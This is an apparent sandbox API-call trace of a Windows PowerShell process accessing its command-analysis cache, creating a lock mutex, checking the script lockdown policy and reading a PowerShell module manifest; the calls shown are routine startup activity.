	[0058.985] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x184c18d3d0 | out: lpFileInformation=0x184c18d3d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95cbb7af, ftCreationTime.dwHighDateTime=0x1d31d93, ftLastAccessTime.dwLowDateTime=0xc171bbc1, ftLastAccessTime.dwHighDateTime=0x1d31d93, ftLastWriteTime.dwLowDateTime=0xc171bbc1, ftLastWriteTime.dwHighDateTime=0x1d31d93, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1
	[0058.985] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2b0) returned 1
	[0058.985] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x184c18cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6a
	[0058.985] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d230) returned 1
	[0058.985] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x948
	[0058.985] GetFileType (hFile=0x948) returned 0x1
	[0058.985] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d1a0) returned 1
	[0058.985] GetFileType (hFile=0x948) returned 0x1
	[0058.986] ReadFile (in: hFile=0x948, lpBuffer=0x1504773e338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18d098, lpOverlapped=0x0 | out: lpBuffer=0x1504773e338*, lpNumberOfBytesRead=0x184c18d098*=0x1000, lpOverlapped=0x0) returned 1
	[0058.988] ReadFile (in: hFile=0x948, lpBuffer=0x150477400ac, nNumberOfBytesToRead=0x2b, lpNumberOfBytesRead=0x184c18ccc8, lpOverlapped=0x0 | out: lpBuffer=0x150477400ac*, lpNumberOfBytesRead=0x184c18ccc8*=0x2b, lpOverlapped=0x0) returned 1
	[0058.988] ReadFile (in: hFile=0x948, lpBuffer=0x1504773e338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18cd68, lpOverlapped=0x0 | out: lpBuffer=0x1504773e338*, lpNumberOfBytesRead=0x184c18cd68*=0x1000, lpOverlapped=0x0) returned 1
	[0058.992] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbdd630
	[0058.992] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1505fbdd630 | out: pszPath="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0058.992] CoTaskMemFree (pv=0x1505fbdd630) 
	[0058.992] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x184c18cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local", lpFilePart=0x0) returned 0x1f
	[0058.992] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x184c18cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x4d
	[0058.992] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d370) returned 1
	[0058.993] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x184c18d450 | out: lpFileInformation=0x184c18d450*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95cbb7af, ftCreationTime.dwHighDateTime=0x1d31d93, ftLastAccessTime.dwLowDateTime=0xc171bbc1, ftLastAccessTime.dwHighDateTime=0x1d31d93, ftLastWriteTime.dwLowDateTime=0xc171bbc1, ftLastWriteTime.dwHighDateTime=0x1d31d93, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1
	[0058.993] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d330) returned 1
	[0058.993] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_b546bd1f-3b03-41b0-bebc-d44f0a030d28", nBufferLength=0x105, lpBuffer=0x184c18cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_b546bd1f-3b03-41b0-bebc-d44f0a030d28", lpFilePart=0x0) returned 0x8f
	[0058.993] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d2b0) returned 1
	[0058.993] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_b546bd1f-3b03-41b0-bebc-d44f0a030d28" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_b546bd1f-3b03-41b0-bebc-d44f0a030d28"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x948
	[0058.993] GetFileType (hFile=0x948) returned 0x1
	[0058.993] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d220) returned 1
	[0058.993] GetFileType (hFile=0x948) returned 0x1
	[0058.993] SetEndOfFile (hFile=0x948) returned 1
	[0058.998] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbd7f10
	[0058.998] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1505fbd7f10 | out: pszPath="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0058.998] CoTaskMemFree (pv=0x1505fbd7f10) 
	[0058.998] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x184c18cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local", lpFilePart=0x0) returned 0x1f
	[0058.998] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x184c18ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x4d
	[0058.998] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d310) returned 1
	[0058.998] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x184c18d3f0 | out: lpFileInformation=0x184c18d3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95cbb7af, ftCreationTime.dwHighDateTime=0x1d31d93, ftLastAccessTime.dwLowDateTime=0xc171bbc1, ftLastAccessTime.dwHighDateTime=0x1d31d93, ftLastWriteTime.dwLowDateTime=0xc171bbc1, ftLastWriteTime.dwHighDateTime=0x1d31d93, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1
	[0058.998] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2d0) returned 1
	[0058.998] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x184c18cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6a
	[0058.998] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d250) returned 1
	[0058.999] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x948
	[0058.999] GetFileType (hFile=0x948) returned 0x1
	[0058.999] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d1c0) returned 1
	[0058.999] GetFileType (hFile=0x948) returned 0x1
	[0058.999] SetEndOfFile (hFile=0x948) returned 1
	[0059.001] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184c18dab0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18dab0*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x66, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0059.001] SetEvent (hEvent=0x934) returned 1
	[0059.002] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x184c18dc70*=0x934, lpdwindex=0x184c18da44 | out: lpdwindex=0x184c18da44) returned 0x0
	[0059.002] GetCurrentProcess () returned 0xffffffffffffffff
	[0059.002] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x184c18def8 | out: TokenHandle=0x184c18def8*=0x948) returned 1
	[0059.002] GetTokenInformation (in: TokenHandle=0x948, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x184c18dff8 | out: TokenInformation=0x0, ReturnLength=0x184c18dff8) returned 0
	[0059.002] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1505fc9ade0
	[0059.002] GetTokenInformation (in: TokenHandle=0x948, TokenInformationClass=0x1, TokenInformation=0x1505fc9ade0, TokenInformationLength=0x2c, ReturnLength=0x184c18dff8 | out: TokenInformation=0x1505fc9ade0, ReturnLength=0x184c18dff8) returned 1
	[0059.002] LocalFree (hMem=0x1505fc9ade0) returned 0x0
	[0059.002] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x15047764b30, cbSid=0x184c18dff0 | out: pSid=0x15047764b30*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x184c18dff0) returned 1
	[0059.002] CreateMutexW (lpMutexAttributes=0x15047764c80, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000") returned 0x94c
	[0059.002] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x184c18de90*=0x94c, lpdwindex=0x184c18dc64 | out: lpdwindex=0x184c18dc64) returned 0x0
	[0059.003] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x184c18d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x4d
	[0059.003] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18de10) returned 1
	[0059.003] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x184c18def0 | out: lpFileInformation=0x184c18def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95cbb7af, ftCreationTime.dwHighDateTime=0x1d31d93, ftLastAccessTime.dwLowDateTime=0xc171bbc1, ftLastAccessTime.dwHighDateTime=0x1d31d93, ftLastWriteTime.dwLowDateTime=0xc171bbc1, ftLastWriteTime.dwHighDateTime=0x1d31d93, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1
	[0059.003] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18ddd0) returned 1
	[0059.003] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x184c18d870, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6a
	[0059.003] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd50) returned 1
	[0059.003] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x950
	[0059.003] GetFileType (hFile=0x950) returned 0x1
	[0059.003] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dcc0) returned 1
	[0059.003] GetFileType (hFile=0x950) returned 0x1
	[0059.003] ReadFile (in: hFile=0x950, lpBuffer=0x15047765d08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18dbb8, lpOverlapped=0x0 | out: lpBuffer=0x15047765d08*, lpNumberOfBytesRead=0x184c18dbb8*=0x1000, lpOverlapped=0x0) returned 1
	[0059.004] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0x184c18db60, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77
	[0059.004] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dfe0) returned 1
	[0059.004] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1"), fInfoLevelId=0x0, lpFileInformation=0x15047772ea0 | out: lpFileInformation=0x15047772ea0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955)) returned 1
	[0059.004] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dfa0) returned 1
	[0059.004] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x184c18da90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x4d
	[0059.004] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18ded0) returned 1
	[0059.004] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfb0 | out: lpFileInformation=0x184c18dfb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95cbb7af, ftCreationTime.dwHighDateTime=0x1d31d93, ftLastAccessTime.dwLowDateTime=0xc171bbc1, ftLastAccessTime.dwHighDateTime=0x1d31d93, ftLastWriteTime.dwLowDateTime=0xc171bbc1, ftLastWriteTime.dwHighDateTime=0x1d31d93, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1
	[0059.004] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18de90) returned 1
	[0059.004] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_b546bd1f-3b03-41b0-bebc-d44f0a030d28", nBufferLength=0x105, lpBuffer=0x184c18d930, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_b546bd1f-3b03-41b0-bebc-d44f0a030d28", lpFilePart=0x0) returned 0x8f
	[0059.004] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18de10) returned 1
	[0059.004] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_b546bd1f-3b03-41b0-bebc-d44f0a030d28" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_b546bd1f-3b03-41b0-bebc-d44f0a030d28"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x950
	[0059.005] GetFileType (hFile=0x950) returned 0x1
	[0059.005] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd80) returned 1
	[0059.005] GetFileType (hFile=0x950) returned 0x1
	[0059.009] ReadFile (in: hFile=0x950, lpBuffer=0x15047579cd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18dc78, lpOverlapped=0x0 | out: lpBuffer=0x15047579cd8*, lpNumberOfBytesRead=0x184c18dc78*=0x1000, lpOverlapped=0x0) returned 1
	[0059.010] CoCreateGuid (in: pguid=0x184c18e0a8 | out: pguid=0x184c18e0a8*(Data1=0x75eb6196, Data2=0x3205, Data3=0x4113, Data4=([0]=0xbd, [1]=0xdc, [2]=0xb7, [3]=0x14, [4]=0x7f, [5]=0x89, [6]=0x6e, [7]=0xf1))) returned 0x0
	[0059.010] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x950
	[0059.010] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x954
	[0059.010] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x958
	[0059.010] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x95c
	[0059.010] SetEvent (hEvent=0x95c) returned 1
	[0059.010] SetEvent (hEvent=0x950) returned 1
	[0059.010] SetEvent (hEvent=0x954) returned 1
	[0059.010] SetEvent (hEvent=0x958) returned 1
	[0059.010] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x960
	[0059.011] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0059.013] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x184c18dc08*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18dc08*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x68, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0059.013] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184c18db10*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18db10*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x66, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0059.013] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x184c18dbe8*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x68, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1)) | out: ActivityId=0x184c18dbe8*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x68, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0059.015] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d790) returned 1
	[0059.015] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18d870 | out: lpFileInformation=0x184c18d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955)) returned 1
	[0059.015] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d750) returned 1
	[0059.015] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1")) returned 0x20
	[0059.015] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0x184c18ceb0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77
	[0059.015] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbdc970
	[0059.015] GetSystemDirectoryW (in: lpBuffer=0x1505fbdc970, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0059.015] CoTaskMemFree (pv=0x1505fbdc970) 
	[0059.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18cbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0059.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x184c18cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c
	[0059.015] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d1c0) returned 1
	[0059.015] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x184c18d2a0 | out: lpFileInformation=0x184c18d2a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1
	[0059.016] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d180) returned 1
	[0059.016] WldpGetLockdownPolicy () returned 0x0
	[0059.016] GetSystemInfo (in: lpSystemInfo=0x184c18d300 | out: lpSystemInfo=0x184c18d300*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0059.016] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184c18d208 | out: phkResult=0x184c18d208*=0x964) returned 0x0
	[0059.016] RegQueryValueExW (in: hKey=0x964, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184c18d258, lpData=0x0, lpcbData=0x184c18d250*=0x0 | out: lpType=0x184c18d258*=0x0, lpData=0x0, lpcbData=0x184c18d250*=0x0) returned 0x2
	[0059.016] RegCloseKey (hKey=0x964) returned 0x0
	[0059.016] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0x184c18cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77
	[0059.016] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d0d0) returned 1
	[0059.016] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x964
	[0059.016] GetFileType (hFile=0x964) returned 0x1
	[0059.016] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d040) returned 1
	[0059.016] GetFileType (hFile=0x964) returned 0x1
	[0059.017] SetFilePointer (in: hFile=0x964, lDistanceToMove=0, lpDistanceToMoveHigh=0x184c18d088*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184c18d088*=0) returned 0x0
	[0059.017] ReadFile (in: hFile=0x964, lpBuffer=0x1504759bbf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18d108, lpOverlapped=0x0 | out: lpBuffer=0x1504759bbf8*, lpNumberOfBytesRead=0x184c18d108*=0x955, lpOverlapped=0x0) returned 1
	[0059.017] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbd9010
	[0059.017] GetSystemDirectoryW (in: lpBuffer=0x1505fbd9010, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
